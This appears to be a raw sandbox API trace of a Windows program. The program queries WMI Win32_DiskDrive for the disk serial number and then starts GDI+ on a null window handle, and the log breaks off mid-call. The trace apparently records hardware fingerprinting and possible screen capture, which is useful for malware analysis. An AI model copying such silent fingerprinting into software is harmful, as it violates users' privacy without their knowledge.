0x0 [0195.562] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5479370, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38efac | out: ppNamespace=0x38efac*=0x55aa830) returned 0x0 [0196.418] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee30 | out: ppvObject=0x38ee30*=0x55c4bcc) returned 0x0 [0196.418] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c4bcc, pProxy=0x55aa830, pAuthnSvc=0x38ee80, pAuthzSvc=0x38ee7c, pServerPrincName=0x38ee74, pAuthnLevel=0x38ee78, pImpLevel=0x38ee68, pAuthInfo=0x38ee6c, pCapabilites=0x38ee70 | out: pAuthnSvc=0x38ee80*=0xa, pAuthzSvc=0x38ee7c*=0x0, pServerPrincName=0x38ee74, pAuthnLevel=0x38ee78*=0x6, pImpLevel=0x38ee68*=0x2, pAuthInfo=0x38ee6c, pCapabilites=0x38ee70*=0x1) returned 0x0 [0196.418] WbemLocator:IUnknown:Release (This=0x55c4bcc) returned 0x1 [0196.418] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee24 | out: ppvObject=0x38ee24*=0x55c4bec) returned 0x0 [0196.418] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee10 | out: ppvObject=0x38ee10*=0x55c4bcc) returned 0x0 [0196.418] WbemLocator:IClientSecurity:SetBlanket (This=0x55c4bcc, pProxy=0x55aa830, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.419] WbemLocator:IUnknown:Release (This=0x55c4bcc) returned 0x2 [0196.419] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0196.419] CoTaskMemFree (pv=0x55b45e0) [0196.419] WbemLocator:IUnknown:AddRef (This=0x55aa830) returned 0x2 [0196.419] WbemLocator:IUnknown:Release (This=0x5479370) returned 0x0 [0196.419] CoGetContextToken (in: pToken=0x38e364 | out: pToken=0x38e364) returned 0x0 [0196.419] CoGetContextToken (in: pToken=0x38e774 | out: pToken=0x38e774) returned 0x0 [0196.419] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e710 | out: ppvObject=0x38e710*=0x55c4bd4) returned 0x0 [0196.420] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x55ed9d0, dwProperty=2, pdwValue=0x38e804 | out: pdwValue=0x38e804) returned 0x80004002 [0196.420] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0196.420] CoGetContextToken (in: pToken=0x38ed44 | out: pToken=0x38ed44) returned 0x0 [0196.420] CoGetContextToken (in: pToken=0x38eca4 | out: pToken=0x38eca4) returned 0x0 [0196.420] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x38ed74*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ec40 | out: ppvObject=0x38ec40*=0x55aa830) returned 0x0 [0196.420] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x2 [0196.427] SysStringLen (param_1=0x0) returned 0x0 [0196.428] CoGetContextToken (in: pToken=0x38ee64 | out: pToken=0x38ee64) returned 0x0 [0196.428] IWbemServices:ExecQuery (in: This=0x55aa830, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_DiskDrive", lFlags=16, pCtx=0x0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544efd0) returned 0x0 [0196.437] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eec8 | out: ppvObject=0x38eec8*=0x544efd4) returned 0x0 [0196.437] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38ef18, pAuthzSvc=0x38ef14, pServerPrincName=0x38ef0c, pAuthnLevel=0x38ef10, pImpLevel=0x38ef00, pAuthInfo=0x38ef04, pCapabilites=0x38ef08 | out: pAuthnSvc=0x38ef18*=0xa, pAuthzSvc=0x38ef14*=0x0, pServerPrincName=0x38ef0c, pAuthnLevel=0x38ef10*=0x6, pImpLevel=0x38ef00*=0x2, pAuthInfo=0x38ef04, pCapabilites=0x38ef08*=0x1) returned 0x0 [0196.437] IUnknown:Release (This=0x544efd4) returned 0x1 [0196.437] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eebc | out: ppvObject=0x38eebc*=0x55c4a0c) returned 0x0 [0196.437] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eea8 | out: ppvObject=0x38eea8*=0x544efd4) returned 0x0 [0196.437] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.447] IUnknown:Release (This=0x544efd4) returned 0x2 [0196.447] WbemLocator:IUnknown:Release (This=0x55c4a0c) returned 0x1 [0196.447] CoTaskMemFree (pv=0x55b4640) [0196.447] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0196.448] CoGetContextToken (in: pToken=0x38e3e8 | out: pToken=0x38e3e8) returned 0x0 [0196.448] CoGetContextToken (in: pToken=0x38e7fc | out: pToken=0x38e7fc) returned 0x0 [0196.448] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e794 | out: ppvObject=0x38e794*=0x55c49f4) returned 0x0 [0196.448] WbemLocator:IRpcOptions:Query (in: This=0x55c49f4, pPrx=0x55eda00, dwProperty=2, pdwValue=0x38e888 | out: pdwValue=0x38e888) returned 0x80004002 [0196.448] WbemLocator:IUnknown:Release (This=0x55c49f4) returned 0x2 [0196.448] CoGetContextToken (in: pToken=0x38edcc | out: pToken=0x38edcc) returned 0x0 [0196.448] CoGetContextToken (in: pToken=0x38ed2c | out: pToken=0x38ed2c) returned 0x0 [0196.448] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38edfc*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ecc8 | out: ppvObject=0x38ecc8*=0x544efd0) returned 0x0 [0196.449] IUnknown:Release (This=0x544efd0) returned 0x2 [0196.449] SysStringLen (param_1=0x0) returned 0x0 [0196.449] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f0b8 | out: puCount=0x38f0b8*=0x2) returned 0x0 [0196.449] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0b4*=0x0, pszText=0x0 | out: puBuffLength=0x38f0b4*=0xf, pszText=0x0) returned 0x0 [0196.449] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0b4*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f0b4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.449] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0196.449] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f0c4 | out: ppEnum=0x38f0c4*=0x544f098) returned 0x0 [0196.450] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef80 | out: ppvObject=0x38ef80*=0x544f09c) returned 0x0 [0196.450] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38efd0, pAuthzSvc=0x38efcc, pServerPrincName=0x38efc4, pAuthnLevel=0x38efc8, pImpLevel=0x38efb8, pAuthInfo=0x38efbc, pCapabilites=0x38efc0 | out: pAuthnSvc=0x38efd0*=0xa, pAuthzSvc=0x38efcc*=0x0, pServerPrincName=0x38efc4, pAuthnLevel=0x38efc8*=0x6, pImpLevel=0x38efb8*=0x2, pAuthInfo=0x38efbc, pCapabilites=0x38efc0*=0x1) returned 0x0 [0196.451] IUnknown:Release (This=0x544f09c) returned 0x1 [0196.451] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef74 | out: ppvObject=0x38ef74*=0x55c4dcc) returned 0x0 [0196.451] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef60 | out: ppvObject=0x38ef60*=0x544f09c) returned 0x0 [0196.451] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.452] IUnknown:Release (This=0x544f09c) returned 0x2 [0196.453] WbemLocator:IUnknown:Release (This=0x55c4dcc) returned 0x1 [0196.453] CoTaskMemFree (pv=0x55b4670) [0196.453] IUnknown:AddRef (This=0x544f098) returned 0x2 [0196.453] CoGetContextToken (in: pToken=0x38e490 | out: pToken=0x38e490) returned 0x0 [0196.453] CoGetContextToken (in: pToken=0x38e8a4 | out: pToken=0x38e8a4) returned 0x0 [0196.453] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e83c | out: ppvObject=0x38e83c*=0x55c4db4) returned 0x0 [0196.453] WbemLocator:IRpcOptions:Query (in: This=0x55c4db4, pPrx=0x55eda60, dwProperty=2, pdwValue=0x38e930 | out: pdwValue=0x38e930) returned 0x80004002 [0196.454] WbemLocator:IUnknown:Release (This=0x55c4db4) returned 0x2 [0196.454] CoGetContextToken (in: pToken=0x38ee74 | out: pToken=0x38ee74) returned 0x0 [0196.454] CoGetContextToken (in: pToken=0x38edd4 | out: pToken=0x38edd4) returned 0x0 [0196.454] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38eea4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed70 | out: ppvObject=0x38ed70*=0x544f098) returned 0x0 [0196.454] IUnknown:Release (This=0x544f098) returned 0x2 [0196.454] SysStringLen (param_1=0x0) returned 0x0 [0196.455] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0196.572] CoTaskMemAlloc (cb=0x4) returned 0x55ed408 [0196.573] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x55ed408, puReturned=0x266b9fc | out: apObjects=0x55ed408*=0x53f69d0, puReturned=0x266b9fc*=0x1) returned 0x0 [0196.581] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e71c | out: ppvObject=0x38e71c*=0x53f69d0) returned 0x0 [0196.581] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e6d0 | out: ppvObject=0x38e6d0*=0x0) returned 0x80004002 [0196.582] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e4f8 | out: ppvObject=0x38e4f8*=0x0) returned 0x80004002 [0196.582] IUnknown:AddRef (This=0x53f69d0) returned 0x3 [0196.582] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e02c | out: ppvObject=0x38e02c*=0x0) returned 0x80004002 [0196.582] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38dfdc | out: ppvObject=0x38dfdc*=0x0) returned 0x80004002 [0196.582] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38dfe8 | out: ppvObject=0x38dfe8*=0x53f69d4) returned 0x0 [0196.583] IMarshal:GetUnmarshalClass (in: This=0x53f69d4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38dff0 | out: pCid=0x38dff0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0196.583] IUnknown:Release (This=0x53f69d4) returned 0x3 [0196.583] CoGetContextToken (in: pToken=0x38e048 | out: pToken=0x38e048) returned 0x0 [0196.583] CoGetContextToken (in: pToken=0x38e45c | out: pToken=0x38e45c) returned 0x0 [0196.583] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e4dc | out: ppvObject=0x38e4dc*=0x0) returned 0x80004002 [0196.583] IUnknown:Release (This=0x53f69d0) returned 0x2 [0196.583] CoGetContextToken (in: pToken=0x38ea44 | out: pToken=0x38ea44) returned 0x0 [0196.583] CoGetContextToken (in: pToken=0x38e9a4 | out: pToken=0x38e9a4) returned 0x0 [0196.583] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x38ea74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ea70 | out: ppvObject=0x38ea70*=0x53f69d0) returned 0x0 [0196.583] IUnknown:AddRef (This=0x53f69d0) returned 0x4 [0196.583] IUnknown:Release (This=0x53f69d0) returned 0x3 [0196.583] IUnknown:Release (This=0x53f69d0) returned 0x2 [0196.583] CoTaskMemFree (pv=0x55ed408) [0196.584] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0196.584] IUnknown:AddRef (This=0x53f69d0) returned 0x3 [0196.586] IWbemClassObject:Get (in: This=0x53f69d0, wszName="__GENUS", lFlags=0, pVal=0x38f0b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f134*=0, plFlavor=0x38f130*=0 | out: pVal=0x38f0b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f134*=3, plFlavor=0x38f130*=64) returned 0x0 [0196.588] IWbemClassObject:Get (in: This=0x53f69d0, wszName="__PATH", lFlags=0, pVal=0x38f098*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f11c*=0, plFlavor=0x38f118*=0 | out: pVal=0x38f098*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"", varVal2=0x0), pType=0x38f11c*=8, plFlavor=0x38f118*=64) returned 0x0 [0196.590] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0196.590] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x90 [0196.590] CoGetObjectContext (in: riid=0x2667f40*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f0c4 | out: ppv=0x38f0c4*=0x6d0cac) returned 0x0 [0196.590] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f0bc | out: pAptType=0x38f0bc*=1) returned 0x0 [0196.590] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x2667f28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f0c0 | out: ppvObject=0x38f0c0*=0x0) returned 0x80004002 [0196.590] IUnknown:Release (This=0x6d0cac) returned 0x1 [0196.591] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ea30 | out: ppv=0x38ea30*=0x55ed408) returned 0x0 [0196.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec48 | out: ppvObject=0x38ec48*=0x0) returned 0x80004002 [0196.591] WbemDefPath:IClassFactory:CreateInstance (in: This=0x55ed408, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec54 | out: ppvObject=0x38ec54*=0x53abf38) returned 0x0 [0196.591] WbemDefPath:IUnknown:Release (This=0x55ed408) returned 0x0 [0196.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e874 | out: ppvObject=0x38e874*=0x53abf38) returned 0x0 [0196.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e828 | out: ppvObject=0x38e828*=0x0) returned 0x80004002 [0196.592] WbemDefPath:IUnknown:AddRef (This=0x53abf38) returned 0x3 [0196.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e184 | out: ppvObject=0x38e184*=0x0) returned 0x80004002 [0196.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e134 | out: ppvObject=0x38e134*=0x0) returned 0x80004002 [0196.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e140 | out: ppvObject=0x38e140*=0x55ed418) returned 0x0 [0196.592] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55ed418, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e148 | out: pCid=0x38e148*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.592] WbemDefPath:IUnknown:Release (This=0x55ed418) returned 0x3 [0196.592] CoGetContextToken (in: pToken=0x38e1a0 | out: pToken=0x38e1a0) returned 0x0 [0196.592] CoGetContextToken (in: pToken=0x38e5b4 | out: pToken=0x38e5b4) returned 0x0 [0196.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e634 | out: ppvObject=0x38e634*=0x0) returned 0x80004002 [0196.592] WbemDefPath:IUnknown:Release (This=0x53abf38) returned 0x2 [0196.592] WbemDefPath:IUnknown:Release (This=0x53abf38) returned 0x1 [0196.592] CoGetContextToken (in: pToken=0x38ef44 | out: pToken=0x38ef44) returned 0x0 [0196.592] CoGetContextToken (in: pToken=0x38eea4 | out: pToken=0x38eea4) returned 0x0 [0196.592] WbemDefPath:IUnknown:QueryInterface (in: This=0x53abf38, riid=0x38ef74*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef70 | out: ppvObject=0x38ef70*=0x53abf38) returned 0x0 [0196.592] WbemDefPath:IUnknown:AddRef (This=0x53abf38) returned 0x3 [0196.592] WbemDefPath:IUnknown:Release (This=0x53abf38) returned 0x2 [0196.592] WbemDefPath:IWbemPath:SetText (This=0x53abf38, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\cimv2:Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\"") returned 0x0 [0196.593] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f0f0 | out: puCount=0x38f0f0*=0x2) returned 0x0 [0196.593] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0ec*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ec*=0xf, pszText=0x0) returned 0x0 [0196.593] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f0ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.593] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f0bc | out: puCount=0x38f0bc*=0x2) returned 0x0 [0196.594] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0b8*=0x0, pszText=0x0 | out: puBuffLength=0x38f0b8*=0xf, pszText=0x0) returned 0x0 [0196.594] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38f0b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38f0b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.594] IWbemClassObject:Get (in: This=0x53f69d0, wszName="SerialNumber", lFlags=0, pVal=0x38f0b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266c2c8*=0, plFlavor=0x266c2cc*=0 | out: pVal=0x38f0b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EUX7V90VXCES1", varVal2=0x0), pType=0x266c2c8*=8, plFlavor=0x266c2cc*=0) returned 0x0 [0196.594] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0196.594] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0196.594] IWbemClassObject:Get (in: This=0x53f69d0, wszName="SerialNumber", lFlags=0, pVal=0x38f0c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x266c2c8*=8, plFlavor=0x266c2cc*=0 | out: pVal=0x38f0c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="EUX7V90VXCES1", varVal2=0x0), pType=0x266c2c8*=8, plFlavor=0x266c2cc*=0) returned 0x0 [0196.594] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0196.594] SysStringByteLen (bstr="EUX7V90VXCES1") returned 0x1a [0196.599] CoGetContextToken (in: pToken=0x38efe8 | out: pToken=0x38efe8) returned 0x0 [0196.599] IUnknown:Release (This=0x544f098) returned 0x1 [0196.599] IUnknown:Release (This=0x544f098) returned 0x0 [0196.613] CoGetContextToken (in: pToken=0x38efe8 | out: pToken=0x38efe8) returned 0x0 [0196.613] IUnknown:Release (This=0x544efd0) returned 0x1 [0196.614] IUnknown:Release (This=0x544efd0) returned 0x0 [0200.041] GdiplusStartup (in: token=0x3ac0a8, input=0x38e608, output=0x38e658 | out: token=0x3ac0a8, output=0x38e658) returned 0x0 [0200.064] GdipCreateFromHWND (hwnd=0x0, graphics=0x38f0f4) returned 0x0 [0200.066] GdipGetDC (graphics=0x492230, hdc=0x38f104) returned 0x0 [0200.080] WideCharToMultiByte 